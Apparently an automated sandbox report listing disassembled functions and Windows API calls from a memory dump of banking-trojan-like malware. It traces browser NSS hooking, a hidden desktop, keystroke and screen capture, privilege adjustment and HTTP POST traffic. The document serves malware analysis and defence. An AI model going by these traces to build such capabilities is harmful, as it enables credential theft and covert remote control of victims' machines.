Part of subcall function 0003B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003B0B3
Part of subcall function 0003B0AD: ReleaseMutex.KERNEL32(?), ref: 0003B0E7
Part of subcall function 0003B0AD: IsWindow.USER32(?), ref: 0003B0EE
Part of subcall function 0003B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0003B108
Part of subcall function 0003B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0003B110

GetWindowInfo.USER32(00000000,?), ref: 0003B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0003B8AD

Part of subcall function 0003B31C: GetAncestor.USER32(?,00000002), ref: 0003B345
Part of subcall function 0003B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0003B370
Part of subcall function 0003B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 0003B3B2
Part of subcall function 0003B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0003B448
Part of subcall function 0003B31C: PostMessageW.USER32(?,00000112,?,?), ref: 0003B49B
Part of subcall function 0003B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0003B4DA

Part of subcall function 0003DCA2: GetClassNameW.USER32(002601CA,?,00000101), ref: 0003DCBD

Part of subcall function 0003B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003B130
Part of subcall function 0003B11C: ReleaseMutex.KERNEL32(?), ref: 0003B14F
Part of subcall function 0003B11C: GetWindowRect.USER32(?,?), ref: 0003B15C
Part of subcall function 0003B11C: IsRectEmpty.USER32(?), ref: 0003B1E0
Part of subcall function 0003B11C: GetWindowLongW.USER32(?,000000F0), ref: 0003B1EF
Part of subcall function 0003B11C: GetParent.USER32(?), ref: 0003B205
Part of subcall function 0003B11C: MapWindowPoints.USER32(00000000,00000000), ref: 0003B20E
Part of subcall function 0003B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0003B232

Strings

@, xrefs: 0003B806
<, xrefs: 0003B769
, xrefs: 0003B654

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000450A3, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00052000,8404F700,00000000), ref: 000450EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00045112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00045137
InternetCloseHandle.WININET(00000000), ref: 0004514F

Strings

GET, xrefs: 000450D0, 000450E7
n&<&F&, xrefs: 00045137
POST, xrefs: 000450C9
Connection: close, xrefs: 00045103, 00045110
HTTP/1.1, xrefs: 000450DF

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 0004D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0004D89D
GetProcessWindowStation.USER32 ref: 0004D8AE

Part of subcall function 0004D83D: GetProcessWindowStation.USER32 ref: 0004D841
Part of subcall function 0004D83D: SetProcessWindowStation.USER32(00000000), ref: 0004D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0004D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0004D8FD
GetCurrentThreadId.KERNEL32(?,?,?,0003731A,?,2937498D,?,00000000), ref: 0004D909
GetThreadDesktop.USER32(00000000), ref: 0004D910

Part of subcall function 0004D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,0004D84D,00000000,?,?,?,0003731A,?,2937498D,?), ref: 0004D81D

SetThreadDesktop.USER32(00000000), ref: 0004D922
CloseDesktop.USER32(00000000), ref: 0004D934
CloseWindowStation.USER32(?), ref: 0004D94F

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 00042507: CreateMutexW.KERNEL32(00052C30,00000000,?,?,?,?,?), ref: 00042528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 0003775B
SetThreadPriority.KERNEL32(00000000), ref: 00037762

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

WaitForSingleObject.KERNEL32(0000EA60), ref: 00037780

Part of subcall function 00049A9E: RegOpenKeyExW.ADVAPI32(80000001,00053EC0,00000000,00000001,?), ref: 00049ADD

CreateMutexW.KERNEL32(00052C30,00000001,?,20000000), ref: 00037843
GetLastError.KERNEL32 ref: 00037853
CloseHandle.KERNEL32(00000000), ref: 00037861

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

Part of subcall function 00044DF0: CreateThread.KERNEL32(00000000,?,00000000,0003748F,00000000,0003748F), ref: 00044E04
Part of subcall function 00044DF0: CloseHandle.KERNEL32(00000000), ref: 00044E0F

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 00037919

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Strings

Global\%08X%08X%08X, xrefs: 0003781D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 0004C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0004D2A8), ref: 0004C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?), ref: 0004C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?), ref: 0004C984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?,00000000), ref: 0004CA0D

Part of subcall function 00044A87: GetCurrentThread.KERNEL32(00000020,00000000,0004C9A1,00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A97
Part of subcall function 00044A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A9E
Part of subcall function 00044A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0004C9A1,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044AB0
Part of subcall function 00044A87: LookupPrivilegeValueW.ADVAPI32(00000000,0004C9A1,?), ref: 00044AD4
Part of subcall function 00044A87: AdjustTokenPrivileges.ADVAPI32(0004C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00044AE9
Part of subcall function 00044A87: GetLastError.KERNEL32 ref: 00044AF3
Part of subcall function 00044A87: CloseHandle.KERNEL32(0004C9A1), ref: 00044B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?,00000000), ref: 0004C9A1

Part of subcall function 0004C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0004C9FB,00000000,?,?,?), ref: 0004C8C6
Part of subcall function 0004C8A1: CloseHandle.KERNEL32(?), ref: 0004C907

Strings

.exe, xrefs: 0004C93B
SeTcbPrivilege, xrefs: 0004C997

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004BD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

EnterCriticalSection.KERNEL32(00053FE4), ref: 0004BDB7
LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004BDE5
EnterCriticalSection.KERNEL32(00053FE4), ref: 0004BE09

Part of subcall function 000414C3: InternetCrackUrlA.WININET ref: 000417AC
Part of subcall function 000414C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 000417CA
Part of subcall function 000414C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 000418E4
Part of subcall function 000414C3: EnterCriticalSection.KERNEL32(00052AC8), ref: 00041910
Part of subcall function 000414C3: LeaveCriticalSection.KERNEL32(00052AC8,?,?), ref: 0004194D

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

Part of subcall function 0004835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 000483B8

Part of subcall function 000440F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0004410D

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

LeaveCriticalSection.KERNEL32(00053FE4,00000000,?,00000000), ref: 0004C04C

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C06B
LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C078

Strings

0, xrefs: 0004BF31
Content-Length, xrefs: 0004BF55
%x, xrefs: 0004BF11

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00039489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 000394EF

Part of subcall function 0003929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 000392D4
Part of subcall function 0003929D: StrStrIW.SHLWAPI(?,?), ref: 0003935C
Part of subcall function 0003929D: StrStrIW.SHLWAPI(?,?), ref: 0003936D
Part of subcall function 0003929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00039389
Part of subcall function 0003929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 000393A7
Part of subcall function 0003929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000393C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0003950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00039582

Part of subcall function 00048AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
Part of subcall function 00048AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A
Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1
Part of subcall function 00048AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
Part of subcall function 00048AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0003961F

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

&, xrefs: 00039560
#, xrefs: 00039567
$, xrefs: 00039552

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 0004B053

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

EnterCriticalSection.KERNEL32(00053FB4), ref: 0004AF36
LeaveCriticalSection.KERNEL32(00053FB4), ref: 0004AFD9

Part of subcall function 0003EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0003EA43
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0003EA54
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0003EA61
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0003EA6E
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0003EA7B
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0003EA88
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0003EA95
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0003EAA2
Part of subcall function 0003EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 0003EAEA
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0003EAF5
Part of subcall function 0003EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0003EB07
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0003EB12
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0003EB1E
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0003EB2B
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0003EB38
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0003EB45
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0003EB52
Part of subcall function 0003EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0003EB5F
Part of subcall function 0003EA11: FreeLibrary.KERNEL32(00000000), ref: 0003EE9C
Part of subcall function 0003EA11: FreeLibrary.KERNEL32(?), ref: 0003EEA6
Part of subcall function 0003EA11: FreeLibrary.KERNEL32(00000000), ref: 0003EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 0004AF9B

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

GetKeyboardState.USER32(?), ref: 0004AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0004B01B

Part of subcall function 0004AD5F: EnterCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AD7C
Part of subcall function 0004AD5F: LeaveCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AD9D
Part of subcall function 0004AD5F: EnterCriticalSection.KERNEL32(00053FB4,?,?,?,?,0004B052,?), ref: 0004ADAE
Part of subcall function 0004AD5F: LeaveCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AE47

Strings

, xrefs: 0004B039

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000451FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0004521D

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 0004524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00045267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00045282
FlushFileBuffers.KERNEL32(00000000), ref: 000452A2

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

CloseHandle.KERNEL32(00000000), ref: 000452B5

Part of subcall function 00048716: SetFileAttributesW.KERNEL32(00000080,00000080,0004B4CD,?), ref: 0004871F
Part of subcall function 00048716: DeleteFileW.KERNEL32(?), ref: 00048729

Strings

P&Z&d&2&n&<&F&, xrefs: 00045267

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004C5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0004C5ED
EnterCriticalSection.KERNEL32(0005400C), ref: 0004C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0004C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 0004C64C

Part of subcall function 0003C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,000420A9), ref: 0003C111
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,000420A9), ref: 0003C125
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0003C132
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0003C13F
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0003C14C

LeaveCriticalSection.KERNEL32(0005400C), ref: 0004C669

Strings

nss3.dll, xrefs: 0004C646
nspr4.dll, xrefs: 0004C63A

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(00053FE4,76C61857,0003C185,00052360), ref: 0004B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0004B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 0004B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 0004B602

Strings

PR_GetNameForIdentity, xrefs: 0004B5BE
PR_GetError, xrefs: 0004B5F2
PR_SetError, xrefs: 0004B5E0

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00037206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 00046444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00046463
Part of subcall function 00046444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,00037518,?), ref: 000464B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 000372EB
SetThreadPriority.KERNEL32(00000000), ref: 000372F2

Part of subcall function 0004D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 0004D88A
Part of subcall function 0004D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0004D89D
Part of subcall function 0004D865: GetProcessWindowStation.USER32 ref: 0004D8AE
Part of subcall function 0004D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0004D8E9
Part of subcall function 0004D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0004D8FD
Part of subcall function 0004D865: GetCurrentThreadId.KERNEL32(?,?,?,0003731A,?,2937498D,?,00000000), ref: 0004D909
Part of subcall function 0004D865: GetThreadDesktop.USER32(00000000), ref: 0004D910
Part of subcall function 0004D865: SetThreadDesktop.USER32(00000000), ref: 0004D922
Part of subcall function 0004D865: CloseDesktop.USER32(00000000), ref: 0004D934
Part of subcall function 0004D865: CloseWindowStation.USER32(?), ref: 0004D94F

Part of subcall function 0003DD09: TlsAlloc.KERNEL32(00052868,00000000,0000018C,00000000,00000000), ref: 0003DD22
Part of subcall function 0003DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0003DD4A
Part of subcall function 0003DD09: CreateEventW.KERNEL32(00052C30,00000001,00000000,?,84889912,?,00000001), ref: 0003DD74
Part of subcall function 0003DD09: CreateMutexW.KERNEL32(00052C30,00000000,?,18782822,?,00000001), ref: 0003DD97
Part of subcall function 0003DD09: CreateFileMappingW.KERNEL32(00000000,00052C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0003DDC2
Part of subcall function 0003DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0003DDD8
Part of subcall function 0003DD09: GetDC.USER32(00000000), ref: 0003DDF5
Part of subcall function 0003DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0003DE15
Part of subcall function 0003DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0003DE1F
Part of subcall function 0003DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0003DE32
Part of subcall function 0003DD09: ReleaseDC.USER32(00000000,?), ref: 0003DE56
Part of subcall function 0003DD09: CreateMutexW.KERNEL32(00052C30,00000000,?,1898B122,?,00000001,000528B8,?,00000102,000528A4,00052E70,00000010,?,?), ref: 0003DF00
Part of subcall function 0003DD09: GetDC.USER32(00000000), ref: 0003DF15
Part of subcall function 0003DD09: CreateCompatibleDC.GDI32(00000000), ref: 0003DF23
Part of subcall function 0003DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0003DF3A
Part of subcall function 0003DD09: SelectObject.GDI32(00000000,00000000), ref: 0003DF4D
Part of subcall function 0003DD09: ReleaseDC.USER32(00000000,00000001), ref: 0003DF65

GetShellWindow.USER32 ref: 00037338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0003736B

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 000373CD
CloseHandle.KERNEL32(?), ref: 000373DD
CloseHandle.KERNEL32(?), ref: 000373E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 000373F2

Part of subcall function 0003D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0003E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0003D714
Part of subcall function 0003D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0003D72F
Part of subcall function 0003D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0003D7C1
Part of subcall function 0003D4B4: GetSystemMetrics.USER32(00000017), ref: 0003D8DB
Part of subcall function 0003D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0003DC67

Part of subcall function 0003DF74: DeleteObject.GDI32(00000000), ref: 0003DF87
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DF97
Part of subcall function 0003DF74: TlsFree.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFA2
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DFB0
Part of subcall function 0003DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFBA
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DFC7
Part of subcall function 0003DF74: SelectObject.GDI32(00000000,00000000), ref: 0003DFE1
Part of subcall function 0003DF74: DeleteObject.GDI32(00000000), ref: 0003DFF2
Part of subcall function 0003DF74: DeleteDC.GDI32(00000000), ref: 0003DFFF
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003E010
Part of subcall function 0003DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0003E01F
Part of subcall function 0003DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0003E038

Part of subcall function 000465B7: recv.WS2_32(?,?,00000400,00000000), ref: 00046600
Part of subcall function 000465B7: #19.WS2_32(?,?,00000000,00000000), ref: 0004661A
Part of subcall function 000465B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00046657

Part of subcall function 0004675E: shutdown.WS2_32(00000000,00000002), ref: 00046766
Part of subcall function 0004675E: #3.WS2_32(00000000), ref: 0004676D

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 000467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000467CC

Part of subcall function 00046774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 000467A7

Part of subcall function 00046403: socket.WS2_32(?,00000001,00000006), ref: 0004640C
Part of subcall function 00046403: connect.WS2_32(00000000,?,-0000001D), ref: 0004642C
Part of subcall function 00046403: #3.WS2_32(00000000,?,?,?,00037518,?), ref: 00046437

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004A6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 0004A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0004A5F4

Part of subcall function 00041049: EnterCriticalSection.KERNEL32(00052AC8), ref: 00041064
Part of subcall function 00041049: LeaveCriticalSection.KERNEL32(00052AC8), ref: 000410E7
Part of subcall function 00041049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 000411B2
Part of subcall function 00041049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 000413EC

SetLastError.KERNEL32(00002F78), ref: 0004A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0004A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0004A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0004A795
EnterCriticalSection.KERNEL32(00053F24), ref: 0004A79D
LeaveCriticalSection.KERNEL32(00053F24,?), ref: 0004A853

Part of subcall function 00045048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0004506A
Part of subcall function 00045048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0004508C
Part of subcall function 00045048: InternetCloseHandle.WININET(?), ref: 00045094

Part of subcall function 00041C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 00041C81
Part of subcall function 00041C3C: CloseHandle.KERNEL32(?), ref: 00041C9A

EnterCriticalSection.KERNEL32(00053F24), ref: 0004A87A
LeaveCriticalSection.KERNEL32(00053F24,?), ref: 0004A8BA

Part of subcall function 00049C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00053F24,0004A893,?), ref: 00049CB1

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00034DBD, Relevance: 12.2, APIs: 8, Instructions: 151

APIs

Part of subcall function 00042507: CreateMutexW.KERNEL32(00052C30,00000000,?,?,?,?,?), ref: 00042528

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 00034E28
CloseHandle.KERNEL32(?), ref: 00034F89

Part of subcall function 0003E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00034E69,?,?,743C152E,00000002), ref: 0003E97F

WaitForMultipleObjects.KERNEL32(000000FF,?,00000000,000000FF), ref: 00034EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 00034EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00034F1A

Part of subcall function 000467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000467CC

Part of subcall function 00044DF0: CreateThread.KERNEL32(00000000,?,00000000,0003748F,00000000,0003748F), ref: 00044E04
Part of subcall function 00044DF0: CloseHandle.KERNEL32(00000000), ref: 00044E0F

